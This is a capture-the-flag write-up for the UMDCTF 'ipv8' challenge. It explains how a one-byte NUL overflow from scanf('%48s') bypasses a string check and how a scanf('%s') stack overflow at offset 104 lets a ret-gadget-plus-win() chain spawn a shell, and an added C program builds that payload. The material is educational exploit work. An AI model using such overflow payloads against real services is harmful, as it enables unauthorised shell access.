ipv8
umdctf
Task: a static 64-bit ELF reads multiple host fields with unsafe scanf calls and checks a stack-resident string before returning. Solution: use a 48-byte destination input to null out the first byte of the checked string, then overflow the source field at offset 104 and return through a ret gadget into win().
ipv8 — UMDCTF
Overview
We are given a 64-bit static ELF named ipv4 and a remote service at challs.umdctf.io:30308. The binary is not stripped, so the important functions are easy to spot during reversing.
The challenge looks like a simple ret2win at first, but the program has an extra logic check that prevents a plain return-address overwrite from working. The solve requires combining two separate input bugs: a one-byte null overflow to bypass the logic gate, and a stack overflow to control RIP.
Description
No original organizer description was preserved in the local notes.
English summary: the program asks for network-style input fields, validates one stack string with check_rine(), and only then returns from main(). We must satisfy that control flow and pivot execution into win(), which spawns a shell.
Binary Protections and Relevant Functions
The binary properties are:
- 64-bit static ELF
- not stripped
- Partial RELRO
- Canary found
- NX enabled
- No PIE
The most important target is:
win() at 0x402f45, which calls system("/bin/sh")
Because PIE is disabled, the win() address is fixed, so a small ROP chain is enough once we can safely return from main(). Two caveats worth keeping in mind. First, checksec reports "Canary found" on a static binary whenever __stack_chk_fail is linked in from libc; the fact that a plain overflow of Source Host Address reaches saved RIP shows that main() itself does not check a canary. Second, the lone ret gadget placed before win() is the usual fix for the 16-byte stack alignment that system() expects from glibc (a movaps on an unaligned rsp otherwise crashes the shell spawn).
Vulnerability Analysis
main() contains two distinct stack input bugs.
1. Source Host Address: classic stack overflow
The Source Host Address field is read with:
scanf("%s", buf)
where buf is the local buffer at rbp-0x60. Since %s has no length limit, this is a normal stack overflow primitive. The working offset from this input to saved RIP is 104 bytes: 0x60 = 96 bytes up to the saved rbp, plus 8 bytes for the saved rbp itself.
2. Destination Host Address: one-byte null overflow
The Destination Host Address field is read with:
scanf("%48s", buf)
into a stack buffer at rbp-0xc0. The width only limits the characters stored to 48; scanf still appends a terminating NUL, so a full 48-character input writes a 49th byte at rbp-0xc0 + 48 = rbp-0x90. That is the first byte of the string check_rine() later tests, which is why a 48-byte Destination Host Address is enough to zero it and open the gate without touching anything else in the frame.
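The following is an added example, not code from the writeup or the challenge, that models both bugs so the mechanics can be checked offline. The frame layout, the placeholder contents of the checked string, the ret gadget address and the helper names (scanf_field, simulate_dst_read, build_src_payload, payload_scanf_safe) are all assumptions; only the offsets (rbp-0xc0, width 48, 104 bytes to saved RIP) and the win() address 0x402f45 come from the page. scanf_field reimplements the %Ns store-then-terminate behaviour so the 49th byte is visible, and payload_scanf_safe adds the check a practitioner wants before sending a chain through %s: any whitespace byte in an address would truncate it.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of main()'s frame, chosen to mirror the offsets in the
 * writeup: the destination buffer sits at rbp-0xc0 and the checked string
 * 48 bytes above it at rbp-0x90. The real frame may contain other locals. */
#define DST_LEN    48
#define CHECK_LEN  16
#define RIP_OFFSET 104            /* source buffer at rbp-0x60: 96 bytes + saved rbp */
#define WIN_ADDR   0x402f45ULL    /* win(), fixed because PIE is disabled */

struct frame {
    char dst[DST_LEN];            /* Destination Host Address, read with %48s */
    char checked[CHECK_LEN];      /* string tested by check_rine() before main() returns */
};

/* Emulates scanf("%<width>s", base+off): stores at most `width` non-whitespace
 * bytes, then unconditionally appends the terminating NUL. Writes go through
 * a raw byte pointer so the 49th byte visibly lands past the field. */
void scanf_field(unsigned char *base, size_t off, size_t width, const char *input)
{
    size_t i = 0;
    while (i < width && input[i] != '\0' && !isspace((unsigned char)input[i])) {
        base[off + i] = (unsigned char)input[i];
        i++;
    }
    base[off + i] = '\0';         /* i == width when the input fills the field */
}

/* Feed `input_len` filler bytes through the %48s read and return the first
 * byte of the checked string afterwards (non-zero: intact, zero: clobbered). */
unsigned char simulate_dst_read(size_t input_len)
{
    struct frame f;
    char input[DST_LEN + 1];

    memset(&f, 0, sizeof f);
    strcpy(f.checked, "PLACEHOLDER");   /* constructed; the real contents are not in the notes */
    if (input_len > DST_LEN)
        input_len = DST_LEN;            /* scanf stops at the width anyway */
    memset(input, 'B', input_len);
    input[input_len] = '\0';

    scanf_field((unsigned char *)&f, offsetof(struct frame, dst), DST_LEN, input);
    return (unsigned char)f.checked[0];
}

static void put_le64(unsigned char *p, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

/* Source Host Address payload: filler up to saved RIP, a lone `ret` gadget to
 * keep rsp 16-byte aligned when win() calls system(), then win() itself.
 * Returns the payload length, or 0 if `cap` is too small. */
size_t build_src_payload(unsigned char *out, size_t cap, uint64_t ret_gadget)
{
    size_t n = RIP_OFFSET + 2 * 8;
    if (cap < n)
        return 0;
    memset(out, 'A', RIP_OFFSET);
    put_le64(out + RIP_OFFSET, ret_gadget);
    put_le64(out + RIP_OFFSET + 8, WIN_ADDR);
    return n;
}

/* %s stops at the first whitespace byte (0x09-0x0d, 0x20), so an address
 * containing one would truncate the chain. NUL bytes are fine: scanf stores
 * them. Returns 1 when every byte will be stored as-is. */
int payload_scanf_safe(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (isspace(p[i]))
            return 0;
    return 1;
}

int main(void)
{
    unsigned char chain[RIP_OFFSET + 16];
    uint64_t ret_gadget = 0x401016ULL;   /* hypothetical; locate a real one with ROPgadget */
    size_t n = build_src_payload(chain, sizeof chain, ret_gadget);

    printf("47-byte destination input: checked[0] = 0x%02x\n", simulate_dst_read(47));
    printf("48-byte destination input: checked[0] = 0x%02x\n", simulate_dst_read(48));
    printf("source payload: %zu bytes, scanf-safe = %d\n", n, payload_scanf_safe(chain, n));
    return 0;
}
```

Run stand-alone it shows the checked string's first byte intact after a 47-character destination input and zeroed after a 48-character one, then a 120-byte source payload that passes the whitespace check. Because each field is consumed by its own scanf call, the two payloads are sent as separate whitespace-delimited tokens; the chain's address bytes (0x45 0x2f 0x40 for win()) contain no whitespace, which is what payload_scanf_safe confirms.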
...